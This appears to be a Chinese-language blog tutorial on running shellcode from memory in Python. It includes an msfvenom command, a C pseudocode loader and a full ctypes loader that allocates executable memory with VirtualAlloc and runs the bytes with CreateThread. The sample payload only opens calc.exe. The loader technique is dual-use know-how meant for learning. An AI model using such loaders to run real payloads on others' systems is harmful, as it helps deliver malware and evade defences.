Python内存加载shellcode

生成

首先生成一个测试的msf shellcode

msfvenom -p windows/x64/exec CMD=calc.exe -f python

把其中的shellcode复制出来留待待会使用

原理

大部分脚本语言加载 shellcode 其实都是通过 c 的 ffi 去调用操作系统的api，其实并没有太多的技巧在里面，明白了原理，只需要查一下对应的脚本语言怎么调用 c 即可。

那么我们只需要明白 c 通常是怎么加载 shellcode 的即可一通百通。

那么 c 是怎么加载 shellcode 呢，我们直接从汇编开始探究。

shellcode 这个东西我们明白是一串可执行的二进制（一般可执行文件的拥有可执行权限的section为.text），那么我们先通过其他的手段开辟一片拥有可读可写可执行权限的区域放入我们的 shellcode，然后跳转到 shellcode 首地址去执行就行了，汇编里面改变eip（即当前指令的下一条即将运行指令的虚拟地址）的方法有不少，最简单的就是直接 jmp 过去了。也就是写成伪码大概意思就是（动态申请内存就不写了）

lea eax, shellcode;
jmp eax;

那么我们用 c 怎么表示呢？我这里也写一段伪码（因为本文的重点并不是在于 c 代码的编写）

那么按照刚才的思路，先申请一块可执行的内存，放入 shellcode 然后跳转过去执行即可。

// shellcode
unsigned char shellcode[] =
    "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9" 
    "x64x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08"  
    "x8bx7ex20x8bx36x38x4fx18x75xf3x59x01xd1"  
    ...;
// 定义一个函数类型
typedef void (__stdcall *CODE) ();
// 申请内存
PVOID p = NULL;  
p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// 把shellcode放入内存
memcpy(p, shellcode, sizeof(shellcode));

CODE code =(CODE)p;

code();

我并没有写出一个可用的 c 加载 shellcode，只是旨在点出一下流程，然后引出后面的 python 加载 shellcode，上面我们先申请了一块带有可读可写可执行权限的内存，然后把 shellcode 放进去，然后我们强转为一个函数类型指针，最后调用这个函数，达到了我们的目的。

Python实现

前面我说过，大部分脚本语言加载 shellcode 都是调用的c的ffi，那么我们直接按照之前的思路来就行了。下面我直接贴代码

import ctypes

shellcode =  b""
shellcode += b"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41"
shellcode += b"x50x52x51x56x48x31xd2x65x48x8bx52x60x48"
shellcode += b"x8bx52x18x48x8bx52x20x48x8bx72x50x48x0f"
shellcode += b"xb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7c"
shellcode += b"x02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52"
shellcode += b"x41x51x48x8bx52x20x8bx42x3cx48x01xd0x8b"
shellcode += b"x80x88x00x00x00x48x85xc0x74x67x48x01xd0"
shellcode += b"x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56"
shellcode += b"x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9"
shellcode += b"x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0"
shellcode += b"x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58"
shellcode += b"x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44"
shellcode += b"x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0"
shellcode += b"x41x58x41x58x5ex59x5ax41x58x41x59x41x5a"
shellcode += b"x48x83xecx20x41x52xffxe0x58x41x59x5ax48"
shellcode += b"x8bx12xe9x57xffxffxffx5dx48xbax01x00x00"
shellcode += b"x00x00x00x00x00x48x8dx8dx01x01x00x00x41"
shellcode += b"xbax31x8bx6fx87xffxd5xbbxf0xb5xa2x56x41"
shellcode += b"xbaxa6x95xbdx9dxffxd5x48x83xc4x28x3cx06"
shellcode += b"x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6a"
shellcode += b"x00x59x41x89xdaxffxd5x63x61x6cx63x2ex65"
shellcode += b"x78x65x00"

shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
 
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

注意其中的的每个 c_uint64，这个类型在64位上是必要的，我们需要手动指定 argtypes 和 restype ，否则默认的是 32 位整型。

我的代码里面加了注释，我们可以看到，基本思路也是一样的，先分配一块可读可写可执行代码的内存，在代码中，我使用的是 0x40（PAGE_EXECUTE_READWRITE）和 0x3000 ( 0x1000 | 0x2000)(MEM_COMMIT | MEM_RESERVE)，然后把 shellcode 塞进去，跳过去运行。

相信通过这一片文章的讲解你能够对 shellcode 的本质有更多的了解。

相关阅读:
[转]王垠的过去和现状
 支持向量机(SVM)基础
 C语言编程心得
 Fortran学习心得
 gdb使用心得
 大道至简第一章读后感
 第一个音符
 Exercise 1.20 最大公约数算法
 Exercise 1.19 Fast Fibonacci
Exercise 1.16 1.17 1.18
原文地址：https://www.cnblogs.com/Akkuman/p/11851057.html